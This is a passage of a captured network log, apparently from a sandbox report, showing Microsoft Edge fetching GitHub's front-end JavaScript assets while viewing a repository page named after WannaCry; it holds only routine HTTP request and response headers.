user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 23 Sep 2024 19:06:40 GMT
etag: "0x8DCDC02DAFFB363"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 2073498
x-served-by: cache-iad-kcgs7200030-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 33, 61079
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4b838d7e5c7a168b21fbd7fa1030a182adcbe83a
content-length: 8031
GET

https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 17:58:17 GMT
etag: "0x8DCEED5474BB478"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 5187
x-served-by: cache-iad-kiad7000104-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 195
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 39a5a4e480620eda1a7fb1124a710221b8aa2b9a
content-length: 14265
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-aff936e590ed.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-aff936e590ed.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 15 Oct 2024 13:11:11 GMT
etag: "0x8DCED1AD74F5E0F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 115342
x-served-by: cache-iad-kjyo7100111-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 5841
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a30305e56771caaec3c8fe4f97ef842bbf874783
content-length: 3524
GET

https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 17:15:45 GMT
etag: "0x8DCEE062BC79A3C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 25521
x-served-by: cache-iad-kiad7000053-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 1661
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 330c558bb1c834c67472ac232d4193796f628b36
content-length: 2201
GET

https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-7c0fc5bf86b7.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_failbot_failbot_ts-7c0fc5bf86b7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:31 GMT
etag: "0x8DCD8F8042E40EF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 2082028
x-served-by: cache-iad-kcgs7200136-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 105, 61174
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5c146c03a0467403cf57d31f23d4932f10950e09
content-length: 5759
GET

https://github.githubassets.com/assets/environment-4b64a58433d1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/environment-4b64a58433d1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:53 GMT
etag: 0x8DCAB55CA2435F4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 5067999
x-served-by: cache-iad-kiad7000168-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 70962
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9780be62ef1d9b7dfca4174c7fd201772fd5c48b
content-length: 3284
GET

https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 14:48:22 GMT
etag: "0x8DCE3BA6DAC4270"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1228154
x-served-by: cache-iad-kjyo7100161-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 21, 37877
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dee5cba0570178800ac83bb8e6c40babe1c91dda
content-length: 5763
GET

https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 18:15:49 GMT
etag: "0x8DCE4A09364EC4B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 876500
x-served-by: cache-iad-kcgs7200104-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 21, 29122
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0f2d7562d5aa6eee33c4ea8e75f45cd1280ad8ec
content-length: 3079
GET

https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 16 Sep 2024 23:19:54 GMT
etag: "0x8DCD6A61268C08C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 2608529
x-served-by: cache-iad-kcgs7200045-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 29, 73872
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f806f41d8abf7dbe7fc643d2e3750575ec9fca51
content-length: 4646
GET

https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE3127990285C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1236217
x-served-by: cache-iad-kiad7000108-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 38383
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e1e1a34d5568a4180288b2782c1ccfe931f4e585
content-length: 4463
GET

https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-f5498b8d4e5d.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-f5498b8d4e5d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 10 Oct 2024 13:21:02 GMT
etag: "0x8DCE92E6380B39E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 622768
x-served-by: cache-iad-kjyo7100066-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 20018
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c79bf703113c09969c93101e7b45e64d0b48a20b
content-length: 4310
GET

https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 06 Sep 2024 21:21:21 GMT
etag: "0x8DCCEB9DAE401E8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 3209172
x-served-by: cache-iad-kjyo7100107-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 89, 72825
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9e6ddb6d439c4985dc3054b85323e2d799181f13
content-length: 4840
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:55 GMT
etag: "0x8DCD403787FB10E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1948822
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 57800
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d5b6337413aff6eb2cd7ecd93788a72ce106262d
content-length: 3971
GET

https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:30 GMT
etag: "0x8DCD8F803DFB5F0"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 2082028
x-served-by: cache-iad-kjyo7100088-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 103, 61438
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9910914d0a24cd281b60217b57f54a2519f748bb
content-length: 6483
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE312793D8352"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1236217
x-served-by: cache-iad-kiad7000133-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 38468
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4e29d271538ef489a52c77a50e24b192f733a0a4
content-length: 6302
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-6ce6e035e87d.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-6ce6e035e87d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 05:41:47 GMT
etag: "0x8DCEE6E646B3C8E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 32488
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 2397
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 125bff3113613e0491ea73b624e5815b7ba925eb
content-length: 20375
GET

https://github.githubassets.com/assets/github-elements-073f7c54c837.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/github-elements-073f7c54c837.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE3127901F5D6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236217
x-served-by: cache-iad-kcgs7200143-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 38452
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f53731fb4a84c92de396bc3f65172d40cb2f2d74
content-length: 4239
GET

https://github.githubassets.com/assets/element-registry-b70a6fd78218.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/element-registry-b70a6fd78218.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:17 GMT
etag: "0x8DCEDF0980A135A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kcgs7200174-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 1691
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: da474c88861eb68bf5019550b3f604d5a2ed4fbe
content-length: 11164
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 14:27:31 GMT
etag: "0x8DCEEB7D5F69461"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 11532
x-served-by: cache-iad-kiad7000057-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 194
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1be92aaf17b62254819d5d34c2698b61f60ab7cb
content-length: 8338
GET

https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/2.0
host: github.githubassets.com
